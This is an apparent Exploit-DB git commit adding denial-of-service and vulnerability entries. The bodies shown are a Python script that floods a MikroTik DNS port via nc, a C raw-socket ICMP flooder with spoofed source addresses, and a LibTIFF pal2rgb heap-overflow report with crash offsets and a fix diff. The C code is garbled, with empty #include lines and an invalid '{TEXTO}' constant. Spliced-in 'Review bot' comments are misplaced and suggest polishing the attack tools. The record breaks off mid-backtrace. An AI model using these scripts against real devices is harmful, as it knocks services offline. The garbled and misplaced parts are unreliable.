From 9cea53a35bddad54f56bf73e503ebd9f1af906a2 Mon Sep 17 00:00:00 2001 
From: Offensive Security Date: Tue, 12 Dec 2017 05:02:17 +0000 Subject: [PATCH] DB: 2017-12-12 35 changes to exploits/shellcodes MikroTik RouterBoard 6.39.2 / 6.40.5 DNS - Denial of Service MikroTik 6.40.5 ICMP - Denial of Service iOS/macOS - Kernel Double Free due to IOSurfaceRootUserClient not Respecting MIG Ownership Rules macOS XNU Kernel - Memory Disclosure due to bug in Kernel API for Detecting Kernel Memory Disclosures macOS - 'getrusage' Stack Leak Through struct Padding macOS - 'necp_get_socket_attributes' so_pcb Type Confusion LibTIFF pal2rgb 4.0.9 - Heap Buffer Overflow Entrepreneur Dating Script 2.0.1 - 'marital' / 'gender' / 'country' / 'profileid' SQL Injection Secure E-commerce Script 2.0.1 - 'searchcat' / 'searchmain' SQL Injection Laundry Booking Script 1.0 - 'list?city' SQL Injection Lawyer Search Script 1.1 - 'lawyer-list?city' SQL Injection Multivendor Penny Auction Clone Script 1.0 - SQL Injection Online Exam Test Application Script 1.6 - 'exams.php?sort' SQL Injection Opensource Classified Ads Script 3.2 - SQL Injection PHP Multivendor Ecommerce 1.0 - 'sid' / 'searchcat' / 'chid1' SQL Injection Professional Service Script 1.0 - 'service-list?city' SQL Injection Readymade PHP Classified Script 3.3 - 'subctid' / 'mctid' SQL Injection Readymade Video Sharing Script 3.2 - SQL Injection Responsive Realestate Script 3.2 - 'property-list?tbud' SQL Injection Multireligion Responsive Matrimonial 4.7.2 - 'succid' SQL Injection Responsive Events & Movie Ticket Booking Script 3.2.1 - 'findcity.php?q' SQL Injection Multiplex Movie Theater Booking Script 3.1.5 - 'moid' / 'eid' SQL Injection Single Theater Booking Script 3.2.1 - 'findcity.php?q' SQL Injection Advanced Real Estate Script 4.0.7 - SQL Injection Entrepreneur Bus Booking Script 3.0.4 - 'sourcebus' SQL Injection MLM Forex Market Plan Script 2.0.4 - 'newid' / 'eventid' SQL Injection MLM Forced Matrix 2.0.9 - 'newid' SQL Injection Car Rental Script 2.0.4 - 'val' SQL Injection Groupon Clone Script 
3.01 - 'state_id' / 'search' SQL Injection Muslim Matrimonial Script 3.02 - 'succid' SQL Injection Advanced World Database 2.0.5 - SQL Injection Resume Clone Script 2.0.5 - SQL Injection Basic Job Site Script 2.0.5 - SQL Injection Vanguard 1.4 - Arbitrary File Upload Vanguard 1.4 - SQL Injection --- exploits/hardware/dos/43200.py | 41 ++++ exploits/hardware/dos/43317.c | 162 +++++++++++++ exploits/linux/dos/43322.txt | 391 ++++++++++++++++++++++++++++++++ exploits/macos/dos/43318.c | 69 ++++++ exploits/macos/dos/43319.c | 201 ++++++++++++++++ exploits/macos/dos/43321.c | 235 +++++++++++++++++++ exploits/multiple/dos/43320.txt | 36 +++ exploits/php/webapps/43278.txt | 46 ++++ exploits/php/webapps/43287.txt | 34 +++ exploits/php/webapps/43288.txt | 28 +++ exploits/php/webapps/43289.txt | 28 +++ exploits/php/webapps/43290.txt | 28 +++ exploits/php/webapps/43291.txt | 37 +++ exploits/php/webapps/43292.html | 29 +++ exploits/php/webapps/43293.txt | 49 ++++ exploits/php/webapps/43294.txt | 28 +++ exploits/php/webapps/43295.txt | 35 +++ exploits/php/webapps/43296.txt | 35 +++ exploits/php/webapps/43297.txt | 35 +++ exploits/php/webapps/43299.txt | 27 +++ exploits/php/webapps/43300.txt | 36 +++ exploits/php/webapps/43301.txt | 39 ++++ exploits/php/webapps/43302.txt | 27 +++ exploits/php/webapps/43304.txt | 57 +++++ exploits/php/webapps/43305.txt | 29 +++ exploits/php/webapps/43306.txt | 33 +++ exploits/php/webapps/43307.txt | 26 +++ exploits/php/webapps/43308.txt | 27 +++ exploits/php/webapps/43309.txt | 30 +++ exploits/php/webapps/43310.txt | 27 +++ exploits/php/webapps/43311.txt | 34 +++ exploits/php/webapps/43312.txt | 27 +++ exploits/php/webapps/43314.html | 29 +++ exploits/php/webapps/43315.txt | 43 ++++ exploits/php/webapps/43316.txt | 27 +++ files_exploits.csv | 35 +++ 36 files changed, 2100 insertions(+) create mode 100755 exploits/hardware/dos/43200.py create mode 100644 exploits/hardware/dos/43317.c create mode 100644 exploits/linux/dos/43322.txt create mode 
100644 exploits/macos/dos/43318.c create mode 100644 exploits/macos/dos/43319.c create mode 100644 exploits/macos/dos/43321.c create mode 100644 exploits/multiple/dos/43320.txt create mode 100644 exploits/php/webapps/43278.txt create mode 100644 exploits/php/webapps/43287.txt create mode 100644 exploits/php/webapps/43288.txt create mode 100644 exploits/php/webapps/43289.txt create mode 100644 exploits/php/webapps/43290.txt create mode 100644 exploits/php/webapps/43291.txt create mode 100644 exploits/php/webapps/43292.html create mode 100644 exploits/php/webapps/43293.txt create mode 100644 exploits/php/webapps/43294.txt create mode 100644 exploits/php/webapps/43295.txt create mode 100644 exploits/php/webapps/43296.txt create mode 100644 exploits/php/webapps/43297.txt create mode 100644 exploits/php/webapps/43299.txt create mode 100644 exploits/php/webapps/43300.txt create mode 100644 exploits/php/webapps/43301.txt create mode 100644 exploits/php/webapps/43302.txt create mode 100644 exploits/php/webapps/43304.txt create mode 100644 exploits/php/webapps/43305.txt create mode 100644 exploits/php/webapps/43306.txt create mode 100644 exploits/php/webapps/43307.txt create mode 100644 exploits/php/webapps/43308.txt create mode 100644 exploits/php/webapps/43309.txt create mode 100644 exploits/php/webapps/43310.txt create mode 100644 exploits/php/webapps/43311.txt create mode 100644 exploits/php/webapps/43312.txt create mode 100644 exploits/php/webapps/43314.html create mode 100644 exploits/php/webapps/43315.txt create mode 100644 exploits/php/webapps/43316.txt diff --git a/exploits/hardware/dos/43200.py b/exploits/hardware/dos/43200.py new file mode 100755 index 000000000..7759591e6 --- /dev/null +++ b/exploits/hardware/dos/43200.py 
@@ -0,0 +1,41 @@
+import socket
+import os
+import time
+from threading import Thread
+import sys
+
+
+def rep1():
+ os.system('echo -ne "\x4d\x69\x6b\x72\x6f\x54\x69\x6b\x20\x44\x65\x6e\x69\x61\x6c\x20\x6f\x66\x20\x53\x65\x72\x76\x69\x63\x65\x20\x6f\x6e\x20\x44\x4e\x53\x20\x73\x65\x72\x76\x69\x63\x65\x2e\x20\x48\x6f\x73\x65\x69\x6e\x20\x41\x73\x6b\x61\x72\x69" | dd conv=notrunc bs=1000 seek=500 of=/home/constantine/test/poc')
+ os.system('cat poc | nc -v 192.168.1.1 53')
+
+def rep2():
+ os.system('cat poc | nc -v 192.168.1.1 53')
+
+def rep3():
+ os.system('cat poc | nc -v 192.168.1.1 53')
+
+def rep4():
+ os.system('cat poc | nc -v 192.168.1.1 53')
+
+def rep5():
+ os.system('cat poc | nc -v 192.168.1.1 53')
+
+
+
+if __name__ == "__main__":
+ threads = []
+ try:
+ for a in [rep1, rep2, rep3, rep4, rep5]:
+ t = Thread(target=a)
+ t.start()
+ threads.append(t)
+ time.sleep(4)
+ time.sleep(4)
+ print("For Stopping the attack, Hit CTRL+C now")
+
+
+ except KeyboardInterrupt:
+ sys.exit(0)
+ finally:
+ [t.join() for t in threads]
\ No newline at end of file
diff --git a/exploits/hardware/dos/43317.c b/exploits/hardware/dos/43317.c
new file mode 100644
index 000000000..a33a83c30
--- /dev/null
+++ b/exploits/hardware/dos/43317.c
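Review bot: This script has no header comment at all, while the other files added by this commit open with a `Source:` line and a description, so the commit subject is the only place that identifies it as the `MikroTik RouterBoard 6.39.2 / 6.40.5 DNS - Denial of Service` entry. I would add a top-of-file docstring carrying the product and version from the commit subject, the original source, and the precondition that `rep1` writes its payload with `dd` to the fixed path `/home/constantine/test/poc` while every `rep*` function then reads `poc` from the working directory, so a reader sees why the two paths differ. Two points of style: `socket` is imported but never used, and `[t.join() for t in threads]` in the `finally` block builds a throw-away list purely for its side effect — `for t in threads: t.join()` states the intent directly.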
@@ -0,0 +1,162 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#define handle(i) htons(i)
+#define cicmp 32
+#define aicmp() (a_flags & cicmp)
+#define sending_p() if (sendto(rawsock,&packet,(sizeof packet),0,(struct sockaddr *)&victim,sizeof victim) < 0) {\
+perror("sendto");\
+exit(-1);\
+}
+struct sockaddr_in victim;
+u_long change(const char *host);
+static void inject_iphdr(struct ip *ip, u_char p, u_char len);
+char *class2ip(const char *class);
+static void send_icmp(u_char garbage);
+char *get_plain(const char *crypt_file, const char *xor_data_key);
+static void usage(const char *argv0);
+u_long dstaddr;
+u_short dst_sp, dst_ep, src_sp, src_ep;
+char *src_class, *dst_class;
+int a_flags, rawsock;
+struct {
+int a;
+int b;
+void (*f)(u_char);
+} a_list[] = {
+{ cicmp, ICMP_ECHO, send_icmp },
+{ 0, 0, (void *)NULL },
+};
+int
+main(int argc, char *argv[])
+{
+int n, i, on = 1;
+int b_link;
+#ifdef F_PASS
+struct stat sb;
+#endif
+unsigned int until;
+a_flags = dstaddr = i = 0;
+dst_sp = dst_ep = src_sp = src_ep = 0;
+until = b_link = -1;
+src_class = dst_class = NULL;
+while ( (n = getopt(argc, argv, "Is:h:")) != -1) {
+char *p;
+switch (n) {
+case 'I':
+a_flags |= cicmp;
+break;
+case 'h':
+dstaddr = change(optarg);
+break;
+default:
+usage(argv[0]);
+break;
+}
+}
+if ( (!dstaddr && !i) ||
+(dstaddr && i) ||
+( !aicmp()) ||
+(src_sp != 0 && src_sp > src_ep) ||
+(dst_sp != 0 && dst_sp > dst_ep))
+usage(argv[0]);
+if ( (rawsock = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
+perror("socket");
+exit(-1);
+}
+for (n = 0; ; ) {
+if (b_link != -1 && random() % 100 +1 > b_link) {
+if (random() % 200 +1 > 199)
+usleep(1);
+continue;
+}
+for (i = 0; a_list[i].f != NULL; ++i) {
+if (a_list[i].a & a_flags)
+a_list[i].f(a_list[i].b);
+}
+if (n++ == 100) {
+n = 0;
+}
+}
+exit(0);
+}
+u_long change(const char *host)
+{
+struct hostent *hp;
+
+if ( (hp = gethostbyname(host)) == NULL) {
+perror("gethostbyname");
+exit(-1);
+}
+return 
*(u_long *)hp->h_addr;
+}
+#define RANDOM() (int) random() % 255 +1
+char *
+class2ip(const char *class)
+{
+static char ip[16];
+int i, j;
+
+for (i = 0, j = 0; class[i] != '{TEXTO}'; ++i)
+if (class[i] == '.')
+++j;
+switch (j) {
+case 0:
+sprintf(ip, "%s.%d.%d.%d", class, RANDOM(), RANDOM(), RANDOM());
+break;
+case 1:
+sprintf(ip, "%s.%d.%d", class, RANDOM(), RANDOM());
+break;
+case 2:
+sprintf(ip, "%s.%d", class, RANDOM());
+break;
+default: strncpy(ip, class, 16);
+break;
+}
+return ip;
+}
+static void
+inject_iphdr(struct ip *ip, u_char p, u_char len)
+{
+ip->ip_hl = 5;
+ip->ip_v = 4;
+ip->ip_p = p;
+ip->ip_tos = 0;
+ip->ip_id = random();
+ip->ip_len = len;
+ip->ip_off = 0;
+ip->ip_ttl = 255;
+ip->ip_dst.s_addr = dst_class != NULL ?
+inet_addr(class2ip(dst_class)) :
+dstaddr;
+ip->ip_src.s_addr = src_class != NULL ?
+inet_addr(class2ip(src_class)) :
+random();
+victim.sin_addr.s_addr = ip->ip_dst.s_addr;
+}
+
+static void
+send_icmp(u_char gargabe)
+{
+struct packet {
+struct ip ip;
+struct icmp icmp;
+} packet;
+memset(&packet, 0, sizeof packet);
+inject_iphdr(&packet.ip, IPPROTO_ICMP, handle(sizeof packet));
+packet.icmp.icmp_type = ICMP_ECHO;
+packet.icmp.icmp_code = 0;
+packet.icmp.icmp_cksum = htons( ~(ICMP_ECHO << 8));
+sending_p();
+}
+static void
+usage(const char *argv0)
+{
+printf("-I -h IP\n");
+exit(-1);
+}
\ No newline at end of file
diff --git a/exploits/linux/dos/43322.txt b/exploits/linux/dos/43322.txt
new file mode 100644
index 000000000..f1250cd49
--- /dev/null
+++ b/exploits/linux/dos/43322.txt
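Review bot: As committed this file cannot compile: the eight `#include` directives at the top of the hunk carry no header name, and the loop condition `class[i] != '{TEXTO}'` in `class2ip` is not a valid character constant — both look like the residue of an HTML-to-text pass that dropped the `<...>` of the includes and mangled what was presumably a `'\0'` terminator check, so the archive copy should be re-imported from the original source rather than patched by hand. The same empty `#include` lines appear in the `exploits/macos/dos/43318.c` hunk and in the `test.c` listing quoted inside `exploits/macos/dos/43319.c`. Separately, `get_plain` is declared but never defined, and `until`, `b_link`, `src_class`, `dst_class`, `src_sp`/`src_ep` and `dst_sp`/`dst_ep` are initialized once and never changed, so the `b_link` branch in the main loop and the `src_class`/`dst_class` arms of `inject_iphdr` are dead code; a `/* unused: kept from the original source */` comment or their removal would make that explicit. `usage()` also prints only `-I -h IP`, so a one-line comment on each option (`-I` selects the ICMP entry of `a_list`, `-h` resolves the host via `change()`) would document the only interface the program has.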
@@ -0,0 +1,391 @@ +Source: http://bugzilla.maptools.org/show_bug.cgi?id=2750 + +The vulnerability is triggered by ./tools/pal2rgb $FILE /dev/null + +The asan debug information is below: + +TIFFFetchNormalTag: Warning, IO error during reading of "XResolution"; tag +ignored. +TIFFFetchNormalTag: Warning, IO error during reading of "YResolution"; tag +ignored. +sample.tiff: JPEG compression support is not configured. +TIFFSetField: /dev/null: Unknown pseudo-tag 65537. +TIFFSetField: /dev/null: Unknown pseudo-tag 65538. +sample.tiff: JPEG compression support is not configured. +================================================================= +==29649==ERROR: AddressSanitizer: heap-buffer-overflow on address +0x611000009fe1 at pc 0x0000004f3109 bp 0x7fff697434d0 sp 0x7fff697434c8 +WRITE of size 1 at 0x611000009fe1 thread T0 + #0 0x4f3108 (/home/vagrant/targets/asan/tt/tools/pal2rgb+0x4f3108) + #1 0x7f678dc0cf44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44) + #2 0x419ba5 (/home/vagrant/targets/asan/tt/tools/pal2rgb+0x419ba5) + +0x611000009fe1 is located 0 bytes to the right of 225-byte region +[0x611000009f00,0x611000009fe1) +allocated by thread T0 here: + #0 0x4c3f08 (/home/vagrant/targets/asan/tt/tools/pal2rgb+0x4c3f08) + #1 0x4f2748 (/home/vagrant/targets/asan/tt/tools/pal2rgb+0x4f2748) + #2 0x7f678dc0cf44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44) + +SUMMARY: AddressSanitizer: heap-buffer-overflow +(/home/vagrant/targets/asan/tt/tools/pal2rgb+0x4f3108) +Shadow bytes around the buggy address: + 0x0c227fff93a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c227fff93b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c227fff93c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c227fff93d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c227fff93e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x0c227fff93f0: 00 00 00 00 00 00 00 00 00 00 00 00[01]fa fa fa + 0x0c227fff9400: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c227fff9410: fa fa 
fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c227fff9420: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c227fff9430: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c227fff9440: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==29649==ABORTING + +pal2rgb allocates the output buffer(obuf) too small at tools/pal2rgb.c:188. +That cause heap overflow and lead to memory corruption in TIFFSetupStrips(). + +(gdb) r sample.tiff /dev/null +The program being debugged has been started already. +Start it from the beginning? (y or n) y + +Starting program: /home/vagrant/targets/asan/tt/tools/pal2rgb sample.tiff +/dev/null +TIFFFetchNormalTag: Warning, IO error during reading of "XResolution"; tag +ignored. +TIFFFetchNormalTag: Warning, IO error during reading of "YResolution"; tag +ignored. +sample.tiff: JPEG compression support is not configured. +TIFFSetField: /dev/null: Unknown pseudo-tag 65537. +TIFFSetField: /dev/null: Unknown pseudo-tag 65538. +sample.tiff: JPEG compression support is not configured. +*** Error in `/home/vagrant/targets/asan/tt/tools/pal2rgb': malloc(): memory +corruption: 0x0000000000652160 *** + +Program received signal SIGABRT, Aborted. +0x00007ffff7741c37 in __GI_raise (sig=sig@entry=6) at +../nptl/sysdeps/unix/sysv/linux/raise.c:56 +56 ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory. 
+(gdb) bt +#0 0x00007ffff7741c37 in __GI_raise (sig=sig@entry=6) at +../nptl/sysdeps/unix/sysv/linux/raise.c:56 +#1 0x00007ffff7745028 in __GI_abort () at abort.c:89 +#2 0x00007ffff777e2a4 in __libc_message (do_abort=1, + fmt=fmt@entry=0x7ffff7890310 "*** Error in `%s': %s: 0x%s ***\n") + at ../sysdeps/posix/libc_fatal.c:175 +#3 0x00007ffff778c584 in malloc_printerr (ptr=0x652160, + str=0x7ffff788c4df "malloc(): memory corruption", action=) +at malloc.c:4998 +#4 _int_malloc (av=0x7ffff7acd760 , bytes=24) at malloc.c:3449 +#5 0x00007ffff778dae0 in __GI___libc_malloc (bytes=24) at malloc.c:2893 +#6 0x00000000004122a5 in TIFFSetupStrips (tif=tif@entry=0x651b80) at +tif_write.c:545 +#7 0x00000000004124b5 in TIFFWriteCheck (tif=0x651b80, tiles=, + module=0x42de50 "TIFFWriteScanline") at tif_write.c:613 +#8 0x0000000000412a74 in TIFFWriteScanline (tif=tif@entry=0x651b80, +buf=buf@entry=0x652070, + row=row@entry=0, sample=sample@entry=0) at tif_write.c:56 +#9 0x0000000000401dbd in main (argc=, argv=) at +pal2rgb.c:200 + +Affected version: 4.0.9 +Latest version: 4.0.9 + +pal2rgb allocate output buffer to convert TIFF format. The output buffer always +uses a fixed size(225). However, when write data to output buffer, imagewidth +and imagelength of the input TIFF file are used. it lead to heap overflow. + +1) get imagewidth and imagelength from input TIFF + +tools/pal2rgb.c:142 TIFFGetField(in, TIFFTAG_IMAGEWIDTH, &imagewidth); +tools/pal2rgb.c:143 TIFFGetField(in, TIFFTAG_IMAGELENGTH, &imagelength); + +2) allocate output buffer +tools/pal2rgb.c:188 obuf = (unsigned +char*)_TIFFmalloc(TIFFScanlineSize(out)); // TIFFScanlineSize(out) returns +always 225. + +3) write data to output buffer +tools/pal2rgb.c:191 for (row = 0; row < imagelength; row++) { +tools/pal2rgb.c:192 if (!TIFFReadScanline(in, ibuf, row, 0)) +tools/pal2rgb.c:193 goto done; +tools/pal2rgb.c:194 pp = obuf; +tools/pal2rgb.c:195 for (x = 0; x < imagewidth; x++) { // HEAP +OVERFLOW! 
+tools/pal2rgb.c:196 *pp++ = (unsigned char) rmap[ibuf[x]]; +tools/pal2rgb.c:197 *pp++ = (unsigned char) gmap[ibuf[x]]; +tools/pal2rgb.c:198 *pp++ = (unsigned char) bmap[ibuf[x]]; +tools/pal2rgb.c:199 } +tools/pal2rgb.c:200 if (!TIFFWriteScanline(out, obuf, row, 0)) // +CRASH! +tools/pal2rgb.c:201 goto done; +tools/pal2rgb.c:202 } + +The process's heap memory was corrupted by COLORMAP/mage Width/Image Length of +the TIFF document. The offset of the corresponding values in the poc.tiff file +is shown below. + +COLORMAP { + R : 0x25~0x224 + G : 0x225~0x424 + B : 0x425~0x624 +} + +Image Width : 0x24FE +Image Length : 0x250A + + + Note +You need to log in before you can comment on or make changes to this bug. + +Description From jungun.baek 2017-11-29 00:50:42 +The vulnerability is triggered by ./tools/pal2rgb $FILE /dev/null + +The asan debug information is below: + +TIFFFetchNormalTag: Warning, IO error during reading of "XResolution"; tag +ignored. +TIFFFetchNormalTag: Warning, IO error during reading of "YResolution"; tag +ignored. +sample.tiff: JPEG compression support is not configured. +TIFFSetField: /dev/null: Unknown pseudo-tag 65537. +TIFFSetField: /dev/null: Unknown pseudo-tag 65538. +sample.tiff: JPEG compression support is not configured. 
+================================================================= +==29649==ERROR: AddressSanitizer: heap-buffer-overflow on address +0x611000009fe1 at pc 0x0000004f3109 bp 0x7fff697434d0 sp 0x7fff697434c8 +WRITE of size 1 at 0x611000009fe1 thread T0 + #0 0x4f3108 (/home/vagrant/targets/asan/tt/tools/pal2rgb+0x4f3108) + #1 0x7f678dc0cf44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44) + #2 0x419ba5 (/home/vagrant/targets/asan/tt/tools/pal2rgb+0x419ba5) + +0x611000009fe1 is located 0 bytes to the right of 225-byte region +[0x611000009f00,0x611000009fe1) +allocated by thread T0 here: + #0 0x4c3f08 (/home/vagrant/targets/asan/tt/tools/pal2rgb+0x4c3f08) + #1 0x4f2748 (/home/vagrant/targets/asan/tt/tools/pal2rgb+0x4f2748) + #2 0x7f678dc0cf44 (/lib/x86_64-linux-gnu/libc.so.6+0x21f44) + +SUMMARY: AddressSanitizer: heap-buffer-overflow +(/home/vagrant/targets/asan/tt/tools/pal2rgb+0x4f3108) +Shadow bytes around the buggy address: + 0x0c227fff93a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c227fff93b0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c227fff93c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c227fff93d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c227fff93e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 +=>0x0c227fff93f0: 00 00 00 00 00 00 00 00 00 00 00 00[01]fa fa fa + 0x0c227fff9400: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c227fff9410: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c227fff9420: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c227fff9430: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa + 0x0c227fff9440: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa +Shadow byte legend (one shadow byte represents 8 application bytes): + Addressable: 00 + Partially addressable: 01 02 03 04 05 06 07 + Heap left redzone: fa + Heap right redzone: fb + Freed heap region: fd + Stack left redzone: f1 + Stack mid redzone: f2 + Stack right redzone: f3 + Stack partial redzone: f4 + Stack after return: f5 + 
Stack use after scope: f8 + Global redzone: f9 + Global init order: f6 + Poisoned by user: f7 + Container overflow: fc + Array cookie: ac + Intra object redzone: bb + ASan internal: fe + Left alloca redzone: ca + Right alloca redzone: cb +==29649==ABORTING + +pal2rgb allocates the output buffer(obuf) too small at tools/pal2rgb.c:188. +That cause heap overflow and lead to memory corruption in TIFFSetupStrips(). + +(gdb) r sample.tiff /dev/null +The program being debugged has been started already. +Start it from the beginning? (y or n) y + +Starting program: /home/vagrant/targets/asan/tt/tools/pal2rgb sample.tiff +/dev/null +TIFFFetchNormalTag: Warning, IO error during reading of "XResolution"; tag +ignored. +TIFFFetchNormalTag: Warning, IO error during reading of "YResolution"; tag +ignored. +sample.tiff: JPEG compression support is not configured. +TIFFSetField: /dev/null: Unknown pseudo-tag 65537. +TIFFSetField: /dev/null: Unknown pseudo-tag 65538. +sample.tiff: JPEG compression support is not configured. +*** Error in `/home/vagrant/targets/asan/tt/tools/pal2rgb': malloc(): memory +corruption: 0x0000000000652160 *** + +Program received signal SIGABRT, Aborted. +0x00007ffff7741c37 in __GI_raise (sig=sig@entry=6) at +../nptl/sysdeps/unix/sysv/linux/raise.c:56 +56 ../nptl/sysdeps/unix/sysv/linux/raise.c: No such file or directory. 
+(gdb) bt +#0 0x00007ffff7741c37 in __GI_raise (sig=sig@entry=6) at +../nptl/sysdeps/unix/sysv/linux/raise.c:56 +#1 0x00007ffff7745028 in __GI_abort () at abort.c:89 +#2 0x00007ffff777e2a4 in __libc_message (do_abort=1, + fmt=fmt@entry=0x7ffff7890310 "*** Error in `%s': %s: 0x%s ***\n") + at ../sysdeps/posix/libc_fatal.c:175 +#3 0x00007ffff778c584 in malloc_printerr (ptr=0x652160, + str=0x7ffff788c4df "malloc(): memory corruption", action=) +at malloc.c:4998 +#4 _int_malloc (av=0x7ffff7acd760 , bytes=24) at malloc.c:3449 +#5 0x00007ffff778dae0 in __GI___libc_malloc (bytes=24) at malloc.c:2893 +#6 0x00000000004122a5 in TIFFSetupStrips (tif=tif@entry=0x651b80) at +tif_write.c:545 +#7 0x00000000004124b5 in TIFFWriteCheck (tif=0x651b80, tiles=, + module=0x42de50 "TIFFWriteScanline") at tif_write.c:613 +#8 0x0000000000412a74 in TIFFWriteScanline (tif=tif@entry=0x651b80, +buf=buf@entry=0x652070, + row=row@entry=0, sample=sample@entry=0) at tif_write.c:56 +#9 0x0000000000401dbd in main (argc=, argv=) at +pal2rgb.c:200 + +Affected version: 4.0.9 +Latest version: 4.0.9 +------- Comment #1 From jungun.baek 2017-11-29 01:44:26 ------- +pal2rgb allocate output buffer to convert TIFF format. The output buffer always +uses a fixed size(225). However, when write data to output buffer, imagewidth +and imagelength of the input TIFF file are used. it lead to heap overflow. + +1) get imagewidth and imagelength from input TIFF + +tools/pal2rgb.c:142 TIFFGetField(in, TIFFTAG_IMAGEWIDTH, &imagewidth); +tools/pal2rgb.c:143 TIFFGetField(in, TIFFTAG_IMAGELENGTH, &imagelength); + +2) allocate output buffer +tools/pal2rgb.c:188 obuf = (unsigned +char*)_TIFFmalloc(TIFFScanlineSize(out)); // TIFFScanlineSize(out) returns +always 225. 
+ +3) write data to output buffer +tools/pal2rgb.c:191 for (row = 0; row < imagelength; row++) { +tools/pal2rgb.c:192 if (!TIFFReadScanline(in, ibuf, row, 0)) +tools/pal2rgb.c:193 goto done; +tools/pal2rgb.c:194 pp = obuf; +tools/pal2rgb.c:195 for (x = 0; x < imagewidth; x++) { // HEAP +OVERFLOW! +tools/pal2rgb.c:196 *pp++ = (unsigned char) rmap[ibuf[x]]; +tools/pal2rgb.c:197 *pp++ = (unsigned char) gmap[ibuf[x]]; +tools/pal2rgb.c:198 *pp++ = (unsigned char) bmap[ibuf[x]]; +tools/pal2rgb.c:199 } +tools/pal2rgb.c:200 if (!TIFFWriteScanline(out, obuf, row, 0)) // +CRASH! +tools/pal2rgb.c:201 goto done; +tools/pal2rgb.c:202 } +------- Comment #2 From jungun.baek 2017-11-29 02:28:44 ------- +Created an attachment (id=819) [details] +heap overflow PoC +------- Comment #3 From jungun.baek 2017-11-29 06:33:21 ------- +The process's heap memory was corrupted by COLORMAP/mage Width/Image Length of +the TIFF document. The offset of the corresponding values in the poc.tiff file +is shown below. + +COLORMAP { + R : 0x25~0x224 + G : 0x225~0x424 + B : 0x425~0x624 +} + +Image Width : 0x24FE +Image Length : 0x250A +------- Comment #4 From ncopa@alpinelinux.org 2017-12-07 04:42:35 ------- +The following change fixes the describe behavior: + +diff --git a/tools/pal2rgb.c b/tools/pal2rgb.c +index 7a57800..92d9e29 100644 +--- a/tools/pal2rgb.c ++++ b/tools/pal2rgb.c +@@ -184,15 +184,17 @@ main(int argc, char* argv[]) + { unsigned char *ibuf, *obuf; + register unsigned char* pp; + register uint32 x; +- ibuf = (unsigned char*)_TIFFmalloc(TIFFScanlineSize(in)); +- obuf = (unsigned char*)_TIFFmalloc(TIFFScanlineSize(out)); ++ size_t ibuf_size = TIFFScanlineSize(in); ++ size_t obuf_size = TIFFScanlineSize(out); ++ ibuf = (unsigned char*)_TIFFmalloc(ibuf_size); ++ obuf = (unsigned char*)_TIFFmalloc(obuf_size); + switch (config) { + case PLANARCONFIG_CONTIG: + for (row = 0; row < imagelength; row++) { + if (!TIFFReadScanline(in, ibuf, row, 0)) + goto done; + pp = obuf; +- for (x = 0; x < 
imagewidth; x++) { ++ for (x = 0; x < imagewidth && x < (obuf_size-3); x++) { + *pp++ = (unsigned char) rmap[ibuf[x]]; + *pp++ = (unsigned char) gmap[ibuf[x]]; + *pp++ = (unsigned char) bmap[ibuf[x]]; +@@ -205,15 +207,15 @@ main(int argc, char* argv[]) + for (row = 0; row < imagelength; row++) { + if (!TIFFReadScanline(in, ibuf, row, 0)) + goto done; +- for (pp = obuf, x = 0; x < imagewidth; x++) ++ for (pp = obuf, x = 0; x < imagewidth && x < obuf_size; x++) + *pp++ = (unsigned char) rmap[ibuf[x]]; + if (!TIFFWriteScanline(out, obuf, row, 0)) + goto done; +- for (pp = obuf, x = 0; x < imagewidth; x++) ++ for (pp = obuf, x = 0; x < imagewidth && x < obuf_size; x++) + *pp++ = (unsigned char) gmap[ibuf[x]]; + if (!TIFFWriteScanline(out, obuf, row, 0)) + goto done; +- for (pp = obuf, x = 0; x < imagewidth; x++) ++ for (pp = obuf, x = 0; x < imagewidth && x < obuf_size; x++) + *pp++ = (unsigned char) bmap[ibuf[x]]; + if (!TIFFWriteScanline(out, obuf, row, 0)) + goto done; + + +But the pal2rgb stil segfaults. new backtrace: + +Core was generated by `pal2rgb /home/ncopa/Downloads/poc.tiff out.tiff'. +Program terminated with signal SIGSEGV, Segmentation fault. +#0 0x000065eb6f74f534 in jpeg_abort () from /usr/lib/libjpeg.so.8 +(gdb) bt +#0 0x000065eb6f74f534 in jpeg_abort () from /usr/lib/libjpeg.so.8 +#1 0x000065eb6f9c26b7 in TIFFjpeg_abort (sp=sp@entry=0xdbd8738e7c0) + at tif_jpeg.c:416 +#2 0x000065eb6f9c3f8c in JPEGPreDecode 